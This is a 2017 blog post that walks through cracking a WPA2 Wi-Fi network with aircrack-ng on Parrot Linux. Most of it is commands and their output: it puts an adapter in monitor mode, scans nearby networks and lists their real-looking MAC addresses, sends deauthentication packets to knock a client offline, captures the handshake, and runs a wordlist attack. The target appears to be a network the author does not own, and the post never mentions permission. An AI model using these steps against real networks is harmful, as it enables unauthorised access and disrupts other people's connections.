Cracking a WPA2 network with aircrack-ng and Parrot.

Posted: August 23, 2017. At: 2:36 PM. This was 1 month ago. Post ID: 11250

Starting a USB wireless interface in monitor mode.

┌─[root@parrot][/home/jason]
└──╼ #airmon-ng start wlan1
 
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
 
  PID Name
  593 NetworkManager
  749 wpa_supplicant
  923 dhclient
 
PHY	Interface	Driver		Chipset
 
phy0	wlan0		ath9k		Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy1	wlan1		rt73usb		Belkin Components F5D7050 Wireless G Adapter v3000 [Ralink RT2571W]
 
		(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
		(mac80211 station mode vif disabled for [phy1]wlan1)

Now we need to list all wireless networks to find the one we wish to attack.

┌─[root@parrot][/home/jason/Documents]
└──╼ #airodump-ng wlan1mon

I got this output.

 CH 11 ][ Elapsed: 54 s ][ 2017-08-24 08:13                                         
 
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 00:25:00:FF:94:73   -1        0        0    0  -1  -1                    <length:  0>                                                          
 E0:B9:E5:B8:31:BB  -39       30        0    0  11  54e  WPA2 CCMP   PSK  OPTUSVD3AEDEA                                                         
 E0:B9:E5:6E:D3:69  -77       29        0    0   6  54e  WPA2 CCMP   PSK  Telstra6ED369                                                         
 F4:6B:EF:B8:E9:27  -78       17        0    0  11  54e  WPA2 CCMP   PSK  OPTUS_B8E926                                                          
 FA:AB:05:CF:98:E2  -85        2        0    0   6  54e  OPN              Telstra Air                                                           
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                       
 
 00:25:00:FF:94:73  82:FC:02:C5:6D:52  -79    0 -12      0       10                                                                              
 F4:6B:EF:B8:E9:27  A0:2C:36:E3:CD:C1  -81    0 - 1      0        8                                                                              
 F4:6B:EF:B8:E9:27  F0:C7:7F:78:19:D5  -83    0 - 1      0        1

Select a wireless network access point MAC address and then we are ready to begin attacking the access point.

 CH  6 ][ Elapsed: 5 mins ][ 2017-08-24 08:20 ][ WPA handshake: E0:B9:E5:6E:D3:69                                         
 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 E0:B9:E5:6E:D3:69  -77 100     2540      137    0   6  54e  WPA2 CCMP   PSK  Telstra6ED369                                                     
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                      
 
 E0:B9:E5:6E:D3:69  68:64:4B:2A:10:18  -83    2e- 1      0     1600

There are clients on the wireless network, we can begin to assist the attack by kicking off a client.

Sending a deauth in a separate terminal window to a wireless client to disconnect them and capture a WPA handshake.

┌─[root@parrot][/home/jason]
└──╼ #aireplay-ng -0 6 -a E0:B9:E5:6E:D3:69 -c 68:64:4B:2A:10:18 wlan1mon
08:19:14  Waiting for beacon frame (BSSID: E0:B9:E5:6E:D3:69) on channel 6
08:19:14  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [42|34 ACKs]
08:19:15  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [31|35 ACKs]
08:19:16  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [29|35 ACKs]
08:19:16  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [25|39 ACKs]
08:19:17  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [25|38 ACKs]
08:19:17  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [22|23 ACKs]

The attack in this case was a success. I managed to capture a wireless network handshake by sending deauth packets to the client.

Now I am trying to crack the wireless Pre Shared Key with a wordlist.

┌─[root@parrot][/home/jason]
└──╼ #aircrack-ng password-01.cap -w rockyou.txt

This is what it looks like. But the passkey needs to be in the wordlist to crack it.

                                 Aircrack-ng 1.2 rc4
 
      [00:00:27] 45676/9822768 keys tested (1715.21 k/s) 
 
      Time left: 1 hour, 35 minutes, 0 seconds                   0.47%
 
                       Current passphrase: lovinhim1                  
 
 
      Master Key     : 0F EE 18 DC 93 8B 08 17 41 A8 12 31 DD 43 77 37 
                       A3 C1 87 09 9E A2 CC 80 56 F8 EF 91 B5 0E 51 04 
 
      Transient Key  : A5 32 F4 A1 C6 66 29 42 BB E8 D3 98 9E A3 09 80 
                       65 31 31 05 19 DF A8 23 5D 07 B4 93 89 27 2B 0A 
                       F2 4A 74 BA 89 D8 AA 0D EF 00 9F FE 72 B3 FB CA 
                       B2 3A 31 D3 95 36 54 BC A5 FC 16 E9 4B A0 29 41 
 
      EAPOL HMAC     : 4D 0F 42 12 7C 68 3D 12 F3 A0 67 98 F3 33 19 39

This attack will work once a client is successfully kicked off the network, then they will reconnect to it and the handshake can be captured to a file automatically. This is a great way to crack a wireless network, but the only hard part is cracking the Pre Shared Key. That requires a massive wordlist that can be used against the captured handshake. Once you have a suitable collection of rainbow tables and wordlists, then the Pre Shared Key can be cracked.

No comments have been made. Use this form to start the conversation :)

Leave a Reply